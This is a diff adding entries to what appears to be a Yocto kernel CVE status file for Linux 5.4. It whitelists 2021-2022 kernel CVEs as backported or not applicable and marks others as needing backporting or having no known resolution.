+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47108"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47109"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47110"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47111"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47112"
+
+# CVE-2021-47113 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47114"
+
+# CVE-2021-47116 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47117"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47118"
+
+# CVE-2021-47119 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47120"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47121"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47122"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47123"
+
+# CVE-2021-47124 needs backporting (fixed from 5.13rc2)
+
+# CVE-2021-47125 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47126"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47127"
+
+# CVE-2021-47128 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47129"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47130"
+
+# CVE-2021-47131 needs backporting (fixed from 5.13rc5)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47132"
+
+# CVE-2021-47133 needs backporting (fixed from 5.13rc5)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47134"
+
+# CVE-2021-47135 needs backporting (fixed from 5.13rc5)
+
+# CVE-2021-47136 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47137"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47138"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47139"
+
+# CVE-2021-47140 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47141"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47142"
+
+# CVE-2021-47143 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47144"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47145"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47146"
+
+# CVE-2021-47147 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47148"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47149"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47150"
+
+# CVE-2021-47151 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47152"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47153"
+
+# CVE-2021-47158 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47159"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47160"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47161"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47162"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47163"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47164"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47165"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47166"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47167"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47168"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47169"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47170"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47171"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47172"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47173"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47174"
+
+# CVE-2021-47175 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47176"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47177"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47178"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47179"
+
+# cpe-stable-backport: Backported in 5.4.123
+CVE_CHECK_WHITELIST += "CVE-2021-47180"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-0001"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-0002"
+
+# CVE-2022-0168 needs backporting (fixed from 5.18rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0171"
+
+# cpe-stable-backport: Backported in 5.4.173
+CVE_CHECK_WHITELIST += "CVE-2022-0185"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0264"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0286"
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2022-0322"
+
+# cpe-stable-backport: Backported in 5.4.175
+CVE_CHECK_WHITELIST += "CVE-2022-0330"
+
+# CVE-2022-0382 needs backporting (fixed from 5.16)
+
+# CVE-2022-0400 has no known resolution
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0433"
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-0435"
+
+# CVE-2022-0480 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-0487"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-0492"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-0494"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0500"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0516"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-0617"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2022-0644"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0646"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0742"
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2022-0812"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0847"
+
+# cpe-stable-backport: Backported in 5.4.132
+CVE_CHECK_WHITELIST += "CVE-2022-0850"
+
+# fixed-version: only affects 5.17rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0854"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0995"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0998"
+
+# cpe-stable-backport: Backported in 5.4.185
+CVE_CHECK_WHITELIST += "CVE-2022-1011"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-1012"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1015"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-1016"
+
+# fixed-version: only affects 5.12rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1043"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1048"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-1055"
+
+# CVE-2022-1116 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1158"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-1184"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2022-1195"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1198"
+
+# cpe-stable-backport: Backported in 5.4.185
+CVE_CHECK_WHITELIST += "CVE-2022-1199"
+
+# cpe-stable-backport: Backported in 5.4.190
+CVE_CHECK_WHITELIST += "CVE-2022-1204"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1205"
+
+# CVE-2022-1247 has no known resolution
+
+# CVE-2022-1263 needs backporting (fixed from 5.18rc3)
+
+# CVE-2022-1280 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1353"
+
+# cpe-stable-backport: Backported in 5.4.21
+CVE_CHECK_WHITELIST += "CVE-2022-1419"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-1462"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1508"
+
+# fixed-version: only affects 5.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1516"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1651"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-1652"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1671"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2022-1678"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-1679"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-1729"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1734"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1786"
+
+# CVE-2022-1789 needs backporting (fixed from 5.18)
+
+# cpe-stable-backport: Backported in 5.4.192
+CVE_CHECK_WHITELIST += "CVE-2022-1836"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1852"
+
+# fixed-version: only affects 5.17rc8 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1882"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1943"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-1966"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1972"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1973"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1974"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1975"
+
+# fixed-version: only affects 5.18rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1976"
+
+# fixed-version: only affects 5.13rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1998"
+
+# cpe-stable-backport: Backported in 5.4.181
+CVE_CHECK_WHITELIST += "CVE-2022-20008"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2022-20132"
+
+# cpe-stable-backport: Backported in 5.4.145
+CVE_CHECK_WHITELIST += "CVE-2022-20141"
+
+# CVE-2022-20148 needs backporting (fixed from 5.16rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20153"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2022-20154"
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-20158"
+
+# CVE-2022-20166 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-20368"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2022-20369"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20409"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-20421"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-20422"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20423"
+
+# CVE-2022-20424 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.63
+CVE_CHECK_WHITELIST += "CVE-2022-20565"
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2022-20566"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2022-20567"
+
+# fixed-version: only affects 5.7rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20568"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-20572"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2078"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21123"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21125"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21166"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2022-21385"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-21499"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-21505"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2153"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2196"
+
+# CVE-2022-2209 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.175
+CVE_CHECK_WHITELIST += "CVE-2022-22942"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23036"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23037"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23038"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23039"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23040"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23041"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23042"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2308"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-2318"
+
+# CVE-2022-23222 needs backporting (fixed from 5.17rc1)
+
+# CVE-2022-2327 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-2380"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-23816"
+
+# CVE-2022-23825 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23960"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-24122"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-24448"
+
+# cpe-stable-backport: Backported in 5.4.183
+CVE_CHECK_WHITELIST += "CVE-2022-24958"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-24959"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-2503"
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-25258"
+
+# CVE-2022-25265 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-25375"
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-25636"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2585"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2586"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2588"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2590"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-2602"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-26365"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2022-26373"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-2639"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-26490"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-2663"
+
+# CVE-2022-26878 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-26966"
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-27223"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-27666"
+
+# CVE-2022-27672 needs backporting (fixed from 6.2)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2785"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-27950"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-28356"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-28388"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-28389"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-28390"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2873"
+
+# fixed-version: only affects 5.17rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-28796"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-28893"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2905"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29156"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-2938"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-29581"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29582"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2959"
+
+# CVE-2022-2961 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-2964"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-2977"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-2978"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-29900"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-29901"
+
+# CVE-2022-2991 needs backporting (fixed from 5.15rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29968"
+
+# cpe-stable-backport: Backported in 5.4.212
+CVE_CHECK_WHITELIST += "CVE-2022-3028"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-30594"
+
+# CVE-2022-3061 needs backporting (fixed from 5.18rc5)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3077"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3078"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3103"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3104"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2022-3105"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3106"
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-3107"
+
+# CVE-2022-3108 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3110"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3111"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3112"
+
+# fixed-version: only affects 5.10rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3113"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3114"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-3115"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2022-3169"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3170"
+
+# CVE-2022-3176 needs backporting (fixed from 5.17rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3202"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-32250"
+
+# cpe-stable-backport: Backported in 5.4.201
+CVE_CHECK_WHITELIST += "CVE-2022-32296"
+
+# CVE-2022-3238 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3239"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-32981"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-3303"
+
+# CVE-2022-3344 needs backporting (fixed from 6.1rc7)
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33740"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33741"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33742"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-33743"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33744"
+
+# cpe-stable-backport: Backported in 5.4.192
+CVE_CHECK_WHITELIST += "CVE-2022-33981"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-3424"
+
+# fixed-version: only affects 5.18rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3435"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-34494"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-34495"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2022-34918"
+
+# cpe-stable-backport: Backported in 5.4.225
+CVE_CHECK_WHITELIST += "CVE-2022-3521"
+
+# CVE-2022-3522 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3523 needs backporting (fixed from 6.1rc1)
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3524"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3526"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3531"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3532"
+
+# CVE-2022-3533 has no known resolution
+
+# CVE-2022-3534 needs backporting (fixed from 6.2rc1)
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3535"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3541"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3542"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3543"
+
+# CVE-2022-3544 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.228
+CVE_CHECK_WHITELIST += "CVE-2022-3545"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3564"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3565"
+
+# CVE-2022-3566 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3567 needs backporting (fixed from 6.1rc1)
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-3577"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-3586"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3594"
+
+# CVE-2022-3595 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3606 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.207
+CVE_CHECK_WHITELIST += "CVE-2022-36123"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3619"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-3621"
+
+# cpe-stable-backport: Backported in 5.4.228
+CVE_CHECK_WHITELIST += "CVE-2022-3623"
+
